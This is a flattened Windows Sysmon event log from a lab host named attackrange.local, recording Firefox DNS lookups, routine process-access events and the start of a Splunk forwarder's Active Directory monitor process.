Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000018031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.429{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker-1.txt2021-01-18 14:00:46.429 11241100x800000000000000018030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.429{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\serviceworker-1.txt2021-01-18 14:00:46.429 10341000x800000000000000018029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.381{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.381{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.380{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.348{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.920{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.914{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net013.35.253.166;13.35.253.98;13.35.253.114;13.35.253.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.913{59A5CD1D-945A-6005-3305-00000000A301}7052d1azc1qln24ryf.cloudfront.net0::ffff:13.35.253.163;::ffff:13.35.253.166;::ffff:13.35.253.98;::ffff:13.35.253.114;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.819{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.816{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com034.247.35.215;34.247.250.37;34.248.190.151;54.76.85.106;54.220.130.183;54.229.171.135;63.35.67.147;18.202.169.182;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.815{59A5CD1D-945A-6005-3305-00000000A301}7052logs1408.xiti.com0::ffff:18.202.169.182;::ffff:34.247.35.215;::ffff:34.247.250.37;::ffff:34.248.190.151;::ffff:54.76.85.106;::ffff:54.220.130.183;::ffff:54.229.171.135;::ffff:63.35.67.147;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.730{59A5CD1D-945A-6005-3305-00000000A301}7052e4638.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.727{59A5CD1D-945A-6005-3305-00000000A301}7052e4638.d.akamaiedge.net0104.84.100.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.726{59A5CD1D-945A-6005-3305-00000000A301}7052tag.aticdn.net0type: 5 tag.aticdn.net.edgekey.net;type: 5 e4638.d.akamaiedge.net;::ffff:104.84.100.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.722{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.709{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com035.186.220.219;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.708{59A5CD1D-945A-6005-3305-00000000A301}7052renderer.apester.com0::ffff:35.186.220.219;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.663{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:808::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.644{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com02a00:1450:4001:806::2010;2a00:1450:4001:818::2010;2a00:1450:4001:81a::2010;2a00:1450:4001:825::2010;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.642{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com0216.58.212.144;216.58.212.176;142.250.74.208;172.217.16.144;172.217.18.112;172.217.21.208;172.217.21.240;172.217.22.48;172.217.22.80;172.217.22.112;172.217.23.176;216.58.205.240;216.58.207.80;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.642{59A5CD1D-945A-6005-3305-00000000A301}7052storage.googleapis.com0::ffff:216.58.207.80;::ffff:216.58.212.144;::ffff:216.58.212.176;::ffff:142.250.74.208;::ffff:172.217.16.144;::ffff:172.217.18.112;::ffff:172.217.21.208;::ffff:172.217.21.240;::ffff:172.217.22.48;::ffff:172.217.22.80;::ffff:172.217.22.112;::ffff:172.217.23.176;::ffff:216.58.205.240;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.635{59A5CD1D-945A-6005-3305-00000000A301}7052d2ceu0qq55wtf6.cloudfront.net02600:9000:2057:8600:1a:2bb5:7c80:93a1;2600:9000:2057:9000:1a:2bb5:7c80:93a1;2600:9000:2057:c000:1a:2bb5:7c80:93a1;2600:9000:2057:ce00:1a:2bb5:7c80:93a1;2600:9000:2057:d400:1a:2bb5:7c80:93a1;2600:9000:2057:ec00:1a:2bb5:7c80:93a1;2600:9000:2057:4200:1a:2bb5:7c80:93a1;2600:9000:2057:7c00:1a:2bb5:7c80:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.631{59A5CD1D-945A-6005-3305-00000000A301}7052d2ceu0qq55wtf6.cloudfront.net099.86.7.45;99.86.7.64;99.86.7.97;99.86.7.113;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.630{59A5CD1D-945A-6005-3305-00000000A301}7052secure-media.kicker.de0type: 5 d2ceu0qq55wtf6.cloudfront.net;::ffff:99.86.7.113;::ffff:99.86.7.45;::ffff:99.86.7.64;::ffff:99.86.7.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.422{59A5CD1D-8E56-6005-2E00-00000000A301}246445.175.181.195.in-addr.arpa.0type: 12 frankfurt-44.cdn77.com;C:\Windows\sysmon64.exe 22542200x800000000000000018005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.422{59A5CD1D-8E56-6005-2E00-00000000A301}246453.72.190.35.in-addr.arpa.0type: 12 53.72.190.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}246429.7.86.99.in-addr.arpa.0type: 12 server-99-86-7-29.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}246484.177.222.52.in-addr.arpa.0type: 12 server-52-222-177-84.ham50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.414{59A5CD1D-8E56-6005-2E00-00000000A301}2464104.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-104.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.412{59A5CD1D-8E56-6005-2E00-00000000A301}2464126.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-126.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.412{59A5CD1D-8E56-6005-2E00-00000000A301}246474.98.230.87.in-addr.arpa.0type: 12 ma5037422.psmanaged.com;C:\Windows\sysmon64.exe 22542200x800000000000000017999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.262{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.246{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com035.190.63.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.245{59A5CD1D-945A-6005-3305-00000000A301}7052events.apester.com0::ffff:35.190.63.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.233{59A5CD1D-945A-6005-3305-00000000A301}7052t2.shared.global.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.229{59A5CD1D-945A-6005-3305-00000000A301}7052t2.shared.global.fastly.net0151.101.14.217;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.229{59A5CD1D-945A-6005-3305-00000000A301}7052display.apester.com0type: 5 t2.shared.global.fastly.net;::ffff:151.101.14.217;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.019{59A5CD1D-945A-6005-3305-00000000A301}7052lbnew.consentmanager.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.017{59A5CD1D-945A-6005-3305-00000000A301}7052lbnew.consentmanager.net087.230.98.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:45.016{59A5CD1D-945A-6005-3305-00000000A301}7052consentmanager.mgr.consensu.org0type: 5 lbnew.consentmanager.net;::ffff:87.230.98.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.840{59A5CD1D-945A-6005-3305-00000000A301}7052d37wlqo0pgd5lo.cloudfront.net02600:9000:21a1:9200:e:785c:6700:93a1;2600:9000:21a1:de00:e:785c:6700:93a1;2600:9000:21a1:e000:e:785c:6700:93a1;2600:9000:21a1:e600:e:785c:6700:93a1;2600:9000:21a1:2600:e:785c:6700:93a1;2600:9000:21a1:3a00:e:785c:6700:93a1;2600:9000:21a1:5a00:e:785c:6700:93a1;2600:9000:21a1:6600:e:785c:6700:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.839{59A5CD1D-945A-6005-3305-00000000A301}7052static.apester.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.835{59A5CD1D-945A-6005-3305-00000000A301}7052d37wlqo0pgd5lo.cloudfront.net013.227.156.58;13.227.156.65;13.227.156.80;13.227.156.104;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.834{59A5CD1D-945A-6005-3305-00000000A301}7052a1887.dscq.akamai.net02a02:26f0:eb::214:bd5a;2a02:26f0:eb::214:bd82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:44.834{59A5CD1D-945A-6005-3305-00000000A301}7052votingrelaunch.kicker.de0type: 5 d37wlqo0pgd5lo.cloudfront.net;::ffff:13.227.156.104;::ffff:13.227.156.58;::ffff:13.227.156.65;::ffff:13.227.156.80;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.316{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.300{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.297{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.151{59A5CD1D-948E-6005-4105-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 